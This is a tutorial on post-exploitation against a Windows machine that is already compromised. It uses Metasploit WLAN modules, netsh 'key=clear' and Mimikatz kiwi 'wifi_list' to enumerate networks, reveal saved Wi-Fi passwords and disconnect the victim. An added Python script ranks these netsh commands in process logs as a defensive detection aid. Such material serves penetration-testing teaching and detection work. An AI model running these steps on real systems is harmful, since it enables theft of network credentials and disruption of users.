Most of the security protocols used by Wi-Fi networks are often broken or bypassed, exposing wireless internet traffic to attackers. This article walks through different ways to obtain Basic Service Set (BSS) information about a remote user's Wi-Fi and about their current network connection, how to extract the saved wireless LAN profiles of a remote PC, and finally how to disconnect the target user's Wi-Fi. All of the following attacks are post-exploitation attacks, so they assume you already have a session on the target machine.
Table of Contents
- Introduction
- Working of Wi-Fi
- Types of Wi-Fi security
- WLAN BSS List
- WLAN Current Connection
- WLAN Profile
- WLAN Disconnect
- Mimikatz
- Netsh
Introduction
Wireless networking technology is commonly known as Wi-Fi. It provides high-speed internet access because it works over radio waves. The Wi-Fi trademark is owned by the Wi-Fi Alliance, which officially defines it as Wireless Local Area Network (WLAN) technology. It is supported by many devices and platforms such as mobile phones, PDAs, operating systems, video game consoles, etc., and therefore lets all of these devices communicate easily.
Working of Wi-Fi
As the name suggests, a Wi-Fi network has no physical connection between sender and receiver. It uses radio frequencies within the electromagnetic spectrum and is therefore able to provide high-speed internet access. Every Wi-Fi connection works through an Access Point (AP). The main job of an access point is to broadcast a signal that is detected by client devices; once the signal is detected, the devices connect to the AP in order to use the Wi-Fi network.
Types of Wi-Fi security
- Wired Equivalent Privacy (WEP)
- Wi-Fi Protected Access (WPA)
- Wi-Fi Protected Access 2 (WPA2)
Netsh
Now that you have a session on the victim's PC, drop to a shell and use the following command to list the Wi-Fi networks the victim's PC has connected to over time:
netsh wlan show profiles
Get BSS information of a remote user's Wi-Fi connection
This module gathers information about the wireless Basic Service Sets available to the victim machine, e.g. the SSID and other important details about each wireless network in range.
msf > use post/windows/wlan/wlan_bss_list
msf post(wlan_bss_list) > set session 5
msf post(wlan_bss_list) > exploit
As the above image shows, to date the PC has been connected to the networks Pentest Lab, Sinos, POCO PHONE and ignit. Now we can use the following command to get detailed, BSSID-level information about the networks:
netsh wlan show networks mode=bssid
Now, use the following command to reveal the saved password of a particular Wi-Fi profile:
netsh wlan show profile name="ignit" key=clear
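A defender-side addition (example code written for this page, not from the original post and not part of Metasploit or netsh): the three netsh commands above leave a process-creation trail, so this script runs simple rules over constructed, pipe-separated log lines (assumed here to be a simplification of the Sysmon Event ID 1 / Security 4688 fields) and ranks the key=clear form, the one that discloses the pre-shared key, above plain profile or BSS enumeration.

```python
import re

# Constructed sample process-creation events (a pipe-separated simplification of the
# fields in Sysmon Event ID 1 / Windows Security 4688); not real telemetry.
SAMPLE_LOGS = """\
2024-05-01T10:01:02|WS01|alice|explorer.exe|"C:\\Windows\\System32\\netsh.exe" wlan show interfaces
2024-05-01T10:03:11|WS01|alice|cmd.exe|netsh wlan show profiles
2024-05-01T10:03:20|WS01|alice|cmd.exe|netsh wlan show profile name="ignit" key=clear
2024-05-01T10:03:25|WS01|alice|cmd.exe|netsh wlan show networks mode=bssid
2024-05-01T10:04:00|WS01|SYSTEM|services.exe|"C:\\Windows\\System32\\svchost.exe" -k netsvcs
2024-05-01T10:05:00|WS01|alice|powershell.exe|netsh  WLAN  SHOW  PROFILE  key=clear
"""

# Rules run from most to least severe and classify() stops at the first match: only the
# key=clear form discloses the PSK, so it outranks profile and BSS enumeration.
NETSH = r"\bnetsh(\.exe)?\b.*\bwlan\b.*\bshow\b.*"
RULES = [
    ("wlan_key_clear",    "high",   re.compile(NETSH + r"\bprofile\b.*\bkey\s*=\s*clear\b", re.I)),
    ("wlan_profile_enum", "medium", re.compile(NETSH + r"\bprofiles?\b", re.I)),
    ("wlan_bss_enum",     "low",    re.compile(NETSH + r"\bnetworks\b.*\bmode\s*=\s*bssid\b", re.I)),
]

def parse_line(line):
    """Split one constructed log line into its five fields."""
    ts, host, user, parent, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "parent": parent, "cmd": cmd}

def classify(cmd):
    """Return (rule_name, severity) for the most severe matching rule, else None."""
    for name, severity, pattern in RULES:
        if pattern.search(cmd):
            return name, severity
    return None

def scan(log_text):
    """Return one alert dict per process-creation event that matches a rule."""
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        event = parse_line(raw)
        hit = classify(event["cmd"])
        if hit:
            alerts.append({**event, "rule": hit[0], "severity": hit[1]})
    return alerts

if __name__ == "__main__":
    for a in scan(SAMPLE_LOGS):
        print(f'{a["severity"]:6} {a["rule"]:18} {a["user"]}@{a["host"]} parent={a["parent"]} :: {a["cmd"]}')
```

The parent process and user are kept in each alert because netsh launched from cmd.exe or powershell.exe under an interactive user, rather than by a management agent, is the combination worth triaging first.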
Get current Wi-Fi connection information of a remote user
This module gathers information about the current connection on each wireless LAN interface of the target machine.
msf post(wlan_bss_list) > use post/windows/wlan/wlan_current_connection
msf post(wlan_current_connection) > set session 5
msf post(wlan_current_connection) > run
Get saved wireless LAN profile of a remote user
This module extracts the saved wireless LAN profiles and will also try to decrypt the network key material. The behaviour differs slightly between OS versions when it comes to WPA: on Windows Vista/7 we get the passphrase, whereas on Windows XP we get the PBKDF2-derived key.
msf post(wlan_current_connection) > use post/windows/wlan/wlan_profile
msf post(wlan_profile) > set session 5
msf post(wlan_profile) > exploit
Disconnect a remote user's Wi-Fi connection
This module disconnects the current wireless network connection on the specified interface.
msf > use post/windows/wlan/wlan_disconnect
msf post(wlan_disconnect) > set session 5
msf post(wlan_disconnect) > exploit
Other Way: Mimikatz
Mimikatz, loaded into Meterpreter as the kiwi extension, is another way to get the same information. I call it a post-exploitation toolkit because it has a lot of features, far beyond the ability to dump plain-text passwords.
meterpreter > load kiwi
meterpreter > help
The following commands give you the entire wireless connection list, with passwords as well. VOILA! You got it right.
meterpreter > wifi_list
meterpreter > wifi_list_shared